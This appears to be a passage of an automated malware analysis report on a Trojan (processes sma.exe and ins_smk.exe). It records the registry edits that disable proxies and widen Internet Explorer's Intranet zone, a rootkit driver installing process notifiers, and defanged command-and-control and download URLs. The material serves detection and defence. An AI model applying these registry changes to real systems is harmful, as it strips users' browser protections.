[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 9F 99 0A 02 80 E4 5B 5B C3 02 30 58 33 13 92"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:2108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 B3 A1 6F B1 9E 4B C8 DD 80 C1 44 2C EB 0A 5C"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 00 63 40 41 C7 4F 88 F9 81 CA FE 44 E5 A9 B3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:3112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 24 4C BE F4 1C 44 CF D1 26 A5 4D 1A 51 67 46"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_smk.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 19 1D 15 F9 01 EA 12 A2 D6 0F 97 04 A4 3B BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.7.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.7.0.999
File Description:
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/21873.ashx?e=PcwT4QFtuPBwlKCj/kNh8 L7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1V1dA7x4KTM2T0tY TAasH KYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMdF2wYySv2jl	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/t.ashx?e=wlkQ3WKgYpSt /KxvF2yaltE/YbzB hRnvZi s3jtzHZ5YIGg5oNPk/IV6ft2BimRteg227sOdIp0kvsY0HPnNlsH9PMWVgeYCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/21873.ashx?e=j7YMo/n29XMqqDJt46TNceL7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqfhTy6irisLyMLwVoAmU3rnUzRVzAnl uE2u9JLQWwrLy4nObRfTEBuW6N7VzRzZRPvR04A9l6BnRZMqJOE B8wLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw==	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/t.ashx?e=XOxRKBm2zlxAvMuihpEQc5nRI kIbY7XAZx7JfD/ZiMeaFNcfNJ0DpzaErgvbAYV621wjv8RxAE2k3rChAhMDjlEPoRShnW8YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=Feo0TQZfu6KMgv8CEawhJtJUmOkut48zXLWW3smKBNHCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9Ky1lAgh0GvRJFCsfbigoJtBcxpwjbkEKEepEygzZ5HCHBgq eNMUDOF5rLdz0lnXn574r1XQZFERLoBlFznl6CF8XIwY4UXEFgs IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGAGu mQn2fsDvRuoolmbVZILFqDk7m7hD82t84QhMzI=	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=uWabAt9SLcyBuMQa44hX0JareFt XS7lnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFY9h8tK883C8fdiLeSnalixJzCW7YT37a3xsgiMVE/woTJ0gxPZGJkwMj0/D5C5pj64N7FAIfKHD0333RAvM0VMA04irtcDWeBfFklBXmBrJSjgb6v7cXpPtuHuu2mTp1RABwll NsKggJ1NJoFZyqKwYVgWnVvys8LE7xBDwt4mVUHUwhpTgQgymF592pLJyxGGX0AD6jidFMPF20CMva57cKOVdwGoG5TszfOfx5fXDA6V8R1oJo7qvahkwjxcRjGnDU1S tLbCq4B1iQWYNnk5MTeqccPPQKdfW31f15HrM3NREWq8wbHBGSl3DBfP OYYvVqtMLnONmZFQ6EGE2takpbq4LBcVLP8OH1k7YAfvK748HjafyBo LMQ6LMaamNd3ZXUTzY 8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWPYfLSvPNwvH3Yi3kp2pYsScwlu2E9 2t9VnlI/iF4X8g==	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/21873.ashx?e=j7YMo/n29XMqqDJt46TNceL7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWt6/KwEvQjAfCESiW wqgeJJNlRzoCiiPdLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw==	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=uWabAt9SLcyBuMQa44hX0JareFt XS7lnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFY9h8tK883C8fdiLeSnalixJzCW7YT37a3xsgiMVE/woTJ0gxPZGJkwMj0/D5C5pj64N7FAIfKHD0333RAvM0VMC09xUUAqoccNCUHeR8YCF3RMhMhveZGB//nVFcIvcEaWEp0t/VLWlqBPWgrOywYH8uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45eV3BT5p 3i82tY9Td8QpDEwW1x05BqOf	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoRWn6c6y/lOVjgb6v7cXpPsanicFAEWgMOasa7G8l/zxJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRgBrvvpkJ9n7A70bqKJZm1WSCxag5O5u4Q/NrfOEITMy	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/21873.ashx?e=j7YMo/n29XMqqDJt46TNceL7Ikv3r4hl0kAlMf ohFogzQKqaxF9u3FNjBbFgb1YmKZKBq4UF14SxlAMHHLmWplD3oL1QKQRQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqcnIzPjk7XGtW1B5cJyD8WHLb9RQzbrixrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q==	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRod kiLgUmay4KYX3Ti/i3YOG9SIsJmG3UfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVj2Hy0rzzcLx92It5KdqWLEnMJbthPftrfVZ5SP4heF/I=	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRobDlUjOI3FcBs IILilpWF3zNK4whhQy Y93IDHD2utNjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUd9hJVkTDQWh4fmsDki7RvBFb1hgnFCGg==	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoZmQz1jSMZVP0JQd5HxgIXdqfANv YB6XIJQffTeIm3ijZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUd9hJVkTDQWh4fmsDki7RvBFb1hgnFCGg==	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoRQC4gKM3p050JQd5HxgIXdsn45NULvy1Tc6i7r/RwOX4hMYvtqILweTZ3JhHXtVg4LlYGh62K7VQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd0KMk54yBsLAx6sOb2auZd/FYs1q889gGp1fomnw9MePw==	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/21873.ashx?e=M7A8vgjJHrgnU0zGYqnF7daZD9ii2/f2E13rHoa9hTimy6t0 u4xzc/4PvVcYKfqUA7dl9owwhIeI9VTThLJ3QoyTnjIGwsDHqw5vZq5l38VizWrzz2Aai1pxIHn7ibkOWufSVBCsQTuVqOEbeDQPHv58s/52O3CsivMaAupUnRd4VqhSAhk2COVVvHCTb5Jjgb6v7cXpPu546ss fhCekeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWPYfLSvPNwvH3Yi3kp2pYsScwlu2E9 2t9VnlI/iF4X8g==	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRocgRgxetMCtyAhwsRGINruhH49K9bqCBjptTvQuQU86CVO2qWyDxTHBfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXIDfk8vRSWNDu3xZ0bQ3taLJzSRy ZhIf	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoW16pnq3EtsLKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PDge2J5meb7mV gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBcgN Ty9FJY0O7fFnRtDe1osnNJHL5mEh8=	198.232.124.192
hxxp://d13s98z2lzti92.cloudfront.net/smw9476dp.exe	54.230.99.50
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoRNUM0FVgKbyMTNAagX5zbhadmUyQT5xNbOt/W9fkCR9JJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRgBrvvpkJ9n7A70bqKJZm1WSCxag5O5u4Q/NrfOEITMy	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRoX4r3S9aDbaOBPEhRyyBD7D0lOwqSwnORz0Z05yANjzcUdHLbi5Fo13kPWZgf7JA3i5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjl5XcFPmn7eLza1j1N3xCkMTBbXHTkGo58=	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=aQQpsP6/AW18o9SV8EJ33eL7Ikv3r4hlTzgRpqJtmlcgzQKqaxF9u5Q42ZgYGEkGrf8A39sXauhF1v9LxgoeQ9yvhlGeipNVR32ElWRMNBaHh awOSLtGxlpyUxz527unNoSuC9sBhXrbXCO/xHEATaTesKECEwOPqZ0ytD26UhgKkdlz1lRofsh4s6QQfAos IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGAGu mQn2fsDvRuoolmbVZILFqDk7m7hD82t84QhMzI=	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=c0XmKevqA0lSGyd5XovakSbVQUa08Zx3/lCDRYG1zoogLxC0aXqYrSdIMT2RiZMDI9Pw QuaY uDexQCHyhw9OLt6BhzfOsD0FbaakihgO1P17LdzRwGrcSywkF18Bl8KIVyy9nVE95oyD6CU7dt4Wn8ksZ3j7x1gsDoUhkcyDa4XSJ2T /Zj2VSvOHNjNGn6gNHgF/q1DvbBptC4f3pHrdTkDoD53M3v4ojYShxKAxAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU	198.232.124.192
hxxp://gk36g6j-hvjtfa3f.netdna-ssl.com/6765.ashx?e=EYAmqppYZO/i yJL96 IZU84EaaibZpXIM0CqmsRfbtxTYwWxYG9WJimSgauFBdeEsZQDBxy5lr5LE/y8BOUO1 JfVwpv1Wv16XIqLxILHtgx1Ht egA6a3os1yMNpRFGzy5vsTaNP0Nk8MlICEx8OzO9WsNY04szht13JQkPmzI/9SA5o1UP3mnx3B3l5XzeWOjOtTpaFDLSflwInKoSsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5emS9jXjFgnw=	198.232.124.192
